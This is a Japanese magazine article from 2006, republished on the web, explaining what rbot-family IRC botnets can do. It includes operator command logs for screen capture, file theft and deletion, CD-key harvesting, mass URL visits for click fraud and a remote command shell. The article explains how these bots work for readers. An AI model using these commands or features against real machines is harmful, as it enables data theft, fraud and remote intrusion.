RSS Feed  Twitter  
|
Articles - Malware
2006年3月にハッカージャパン誌に寄稿した記事です。初稿にほとんど修正を加えず掲載しておりますので、古い情報であることにご注意ください。
その他の情報採取

キーロガーやシステム情報の閲覧など、これまで解説してきた内容をみれば、個人情報の採取も行えることがわかるだろう。rbot系では、これ以外にもスクリーンショット画像の保存、そしてハードディスク上のファイルの検索、参照、削除、ダウンロードなどの操作、そして、OSやゲームアプリなどのCDKeyの採取も行うことができる。

また、Windowsのコマンドプロンプト起動によるクライアントの操作も、IRCチャンネル上から行うことや、IRC関連のコマンド(クローン化、チャンネルへの参加、IRCサーバの指定)も用意されている。前述した広告の不正クリックなどについても単純に指定したURLへアクセス指令を出すだけである。

■図14:.captureコマンドでスクリーンキャプチャを保存しDCCで取得。入手後に削除している。

 .capture screen C:\Screenshot.jpg ←キャプチャの保存
<[HJ]-87745> [CAPTURE]: Screen capture saved to: C:\Screenshot.jpg.
.get C:\Screenshot.jpg  ←キャプチャ画像の転送
.delete C:\Screenshot.jpg ←画像の削除
<[HJ]-87745> [FILE]: Deleted 'C:\Screenshot.jpg'.


■図15:ファイルはDCCで転送可能。

dcc


■図16:OSやゲームアプリなどのCDKeyの取得も可能。

 .getcdkeys ←CDKeyの取得コマンド
<[HJ]-87745> Microsoft Windows Product ID CD Key: (xxxxx-xxx-xxxxxxxx-xxxxx). ←キーは修正してあるが、実際には表示されている
<[HJ]-87745> [CDKEYS]: Search completed.


■図17:指定したURLへのアクセス指令。異なるアドレスから一斉にアクセスさせることが可能になる。

 .visit http://www.blackout.org
<[T0x]|576362> [VISIT]: URL visited.
<[T0x]|776363> [VISIT]: URL visited.
<[T0x]|976343> [VISIT]: URL visited.
<[T0x]|434534> [VISIT]: URL visited.
<[T0x]|733742> [VISIT]: URL visited.
<[T0x]|125747> [VISIT]: URL visited.


■図18:コマンドプロンプトをIRCチャンネル上から操作することもできる。

 .opencmd ←cmdを開く
<[HJ]-87745> [CMD]: Remote shell ready.
<[HJ]-87745> Microsoft Windows XP [Version 5.1.2600]
<[HJ]-87745> (C) Copyright 1985-2001 Microsoft Corp.
<[HJ]-87745> C:\Documents and Settings\user>
.cmd dir ←dirコマンドを入力
<[HJ]-87745> dir
<[HJ]-87745>  ドライブ C のボリューム ラベルがありません。
<[HJ]-87745>  ボリューム シリアル番号は 1008-8DEA です
<[HJ]-87745>  C:\Documents and Settings\user のディレクトリ
<[HJ]-87745> 2005/12/14  18:15              .
<[HJ]-87745> 2005/12/14  18:15              ..
<[HJ]-87745> 2005/12/14  17:39              Favorites
<[HJ]-87745> 2005/12/14  17:39              My Documents
<[HJ]-87745> 2005/12/14  18:15              WINDOWS
<[HJ]-87745> 2005/12/14  17:22              スタート メニュー
<[HJ]-87745> 2006/03/22  18:54              デスクトップ
<[HJ]-87745>                0 個のファイル                   0 バイト
<[HJ]-87745>                7 個のディレクトリ   5,895,749,632 バイトの空き領
<[HJ]-87745> C:\Documents and Settings\user>